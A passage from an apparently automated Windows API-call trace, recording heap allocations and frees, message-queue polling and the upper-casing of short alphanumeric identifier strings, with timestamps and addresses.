lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.578] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0267.578] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.578] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0267.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0267.578] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0267.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0267.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0267.578] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0267.578] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0267.579] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0267.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0267.579] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.579] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.579] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0267.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0267.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0267.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.580] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.581] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0267.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0267.581] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0267.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0267.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0267.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0267.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0267.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0267.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0267.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0267.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0267.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0267.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.581] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0267.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0267.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0267.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0267.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0267.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0267.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0267.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0267.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.582] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0267.582] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0267.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0267.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0267.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0267.583] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0267.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0267.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0267.583] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0267.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0267.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0267.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0267.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dc8 [0267.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0267.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0267.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0267.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0267.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0267.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1428 [0267.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0267.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0267.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2b0 [0267.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0267.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0267.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0267.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0267.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0267.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0267.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0267.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0267.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0267.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0267.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0267.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0267.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0267.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0267.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa910 [0267.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0267.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0267.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0267.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.585] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0267.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0267.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0267.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0267.585] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0267.586] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.586] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.586] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.586] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.586] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.586] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0267.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.586] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0267.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.586] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0267.587] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0267.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.592] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0267.592] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.592] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0267.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0267.592] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.592] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0267.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.592] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.592] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.592] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0267.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.593] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.593] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0267.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.593] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0267.593] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0267.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.593] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0267.593] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.593] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.594] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.594] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.594] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0267.594] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 